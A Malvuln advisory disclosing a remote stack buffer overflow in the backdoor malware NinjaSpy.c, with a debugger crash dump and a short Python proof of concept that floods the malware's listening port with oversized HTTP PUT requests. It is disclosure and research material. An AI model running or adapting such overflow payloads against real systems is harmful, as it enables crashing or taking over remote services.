Discovery / credits: malvuln - Malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/6eece319bc108576bd1f4a8364616264.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.NinjaSpy.c Vulnerability: Remote Stack Buffer Overflow Description: The specimen drops a DLL named "cmd.dll" under C:\WINDOWS\ which listens on both TCP ports 2003 and 2004. By sending consecutive HTTP PUT requests with large payload of characters we can cause buffer overflow. Type: PE32 MD5: 6eece319bc108576bd1f4a8364616264 Vuln ID: MVID-2021-0018 Dropped files: cmd.dll ASLR: False DEP: False Safe SEH: True Disclosure: 01/08/2021 Memory Dump: 0:000> .ecxr eax=41414141 ebx=41414141 ecx=03fe0ea2 edx=0019eb08 esi=0420986c edi=03fe0e9d eip=00440f57 esp=0019eae0 ebp=0019eb18 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202 cmd+0x40f57: 00440f57 83bb8001000000 cmp dword ptr [ebx+180h],0 ds:002b:414142c1=???????? FAULTING_IP: cmd+40f57 00440f57 83bb8001000000 cmp dword ptr [ebx+180h],0 EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 00440f57 (cmd+0x00040f57) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 414142c1 Attempt to read from address 414142c1 PROCESS_NAME: cmd.dll OVERLAPPED_MODULE: Address regions for 'jscript9' and 'resourcepolicyclient.dll' overlap ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_PARAMETER1: 00000000 EXCEPTION_PARAMETER2: 414142c1 READ_ADDRESS: 414142c1 FOLLOWUP_IP: cmd+40f57 00440f57 83bb8001000000 cmp dword ptr [ebx+180h],0 MOD_LIST: NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 FAULTING_THREAD: 000014f4 BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141 PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ_FILL_PATTERN_41414141 DEFAULT_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141 LAST_CONTROL_TRANSFER: from 764ee0bb to 00440f57 STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 0019eb18 764ee0bb 00920602 00000046 00000000 cmd+0x40f57 0019eb44 764f8849 03fe0e9d 00920602 00000046 user32!_InternalCallWinProc+0x2b 0019eb68 764fb145 00000046 00000000 0019ed14 user32!InternalCallWinProc+0x20 0019ec38 764e8503 03fe0e9d 00000000 00000046 user32!UserCallWinProcCheckWow+0x1be 0019eca0 764dfbfa 02c1f600 00000000 00000046 user32!DispatchClientMessage+0x1b3 0019ece8 773d0bcd 0019ed04 00000038 0019ee20 user32!__fnINOUTLPWINDOWPOS+0x4a 0019ed38 76832eec 76521878 000f0a14 76521760 ntdll!KiUserCallbackDispatcher+0x4d 0019ed3c 76521878 000f0a14 76521760 0055060a win32u!NtUserSetFocus+0xc 0019ed5c 764ee0bb 0055060a 00000110 000f0a14 user32!MB_DlgProc+0x118 0019ed88 764f8849 76521760 0055060a 00000110 user32!_InternalCallWinProc+0x2b 0019edac 764fac8c 00000110 000f0a14 0019f3e8 user32!InternalCallWinProc+0x20 0019ee30 764dbf65 0055060a 00000110 000f0a14 user32!UserCallDlgProcCheckWow+0x10f 0019ee8c 764dbe45 02c49f90 00000000 00000110 user32!DefDlgProcWorker+0x115 0019eeac 764ee0bb 0055060a 00000110 000f0a14 user32!DefDlgProcW+0x25 0019eed8 764f8849 764dbe20 0055060a 00000110 user32!_InternalCallWinProc+0x2b 0019eefc 764fb145 00000110 000f0a14 0019f3e8 user32!InternalCallWinProc+0x20 0019efcc 764fa89c 7a4afc30 00007ffe 00000110 user32!UserCallWinProcCheckWow+0x1be 0019f038 76505b67 02c49f90 00000000 0019f3e8 user32!SendMessageWorker+0x6ff 0019f154 76506533 764d0000 0267a708 00000000 user32!InternalCreateDialog+0x1137 0019f198 7654043b 00e80416 76521760 0019f3e8 user32!InternalDialogBox+0xc8 0019f264 768339ec 0019f3d0 76522093 0019f3e8 user32!SoftModalMessageBox+0x72b 0019f26c 76522093 0019f3e8 07c43d40 00000000 win32u!NtUserModifyUserStartupInfoFlags+0xc 0019f4ac 0045a743 00e80416 04229764 041f562c user32!MessageBoxWorker+0x29a 0019f530 0045a85a 00000010 0019fd34 0045a87b cmd+0x5a743 0019f658 0045a63f 00000000 004aa4e0 0045e01d cmd+0x5a85a 0019fd50 00420446 00000401 0000036c 00000008 cmd+0x5a63f 0019fd68 764ee0bb 005b0464 00000401 0000036c cmd+0x20446 0019fd94 764f8849 03fe0f05 005b0464 00000401 user32!_InternalCallWinProc+0x2b 0019fdb8 764fb145 00000401 0000036c 00000008 user32!InternalCallWinProc+0x20 0019fe88 764e90dc 03fe0f05 00000000 00000401 user32!UserCallWinProcCheckWow+0x1be 0019fef4 764e38c0 0019ff68 0045a30c 0019ff1c user32!DispatchMessageWorker+0x4ac 0019fefc 0045a30c 0019ff1c 0019ff00 004ce046 user32!DispatchMessageA+0x10 0019ff68 004a992c e046004c 0019ffcc 00404498 cmd+0x5a30c 0019ff80 76e38654 002d2000 76e38630 6a961c86 cmd+0xa992c 0019ff94 773c4a77 002d2000 8aaf072f 00000000 kernel32!BaseThreadInitThunk+0x24 0019ffdc 773c4a47 ffffffff 773e9eda 00000000 ntdll!__RtlUserThreadStart+0x2f 0019ffec 00000000 004ce046 002d2000 00000000 ntdll!_RtlUserThreadStart+0x1b STACK_COMMAND: ~0s; .ecxr ; kb SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: cmd+40f57 FOLLOWUP_NAME: MachineOwner MODULE_NAME: cmd IMAGE_NAME: cmd.dll DEBUG_FLR_IMAGE_TIMESTAMP: 2a425e19 FAILURE_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141_c0000005_cmd.dll!Unknown BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141_cmd+40f57 Exploit/PoC: from socket import * MALWARE_HOST="x.x.x.x" PORT=2004 c=1 JUNK="A"*8601 AMT=10 PAYLOAD = "PUT /"+JUNK+" HTTP/1.0 Content-Type: application/x-www-form-urlencoded Content-Length: dkKoybHost: 35409\r\n"+ "Accept-Charset: "+JUNK def doit(): global c, JUNK, PAYLOAD, AMT while True: s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) s.send(PAYLOAD) s.close() c+=1 if c==AMT: print("Backdoor.Win32.NinjaSpy.c / Remote Stack Buffer Overflow") print("MD5: 6eece319bc108576bd1f4a8364616264") print("By Malvuln") exit() if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).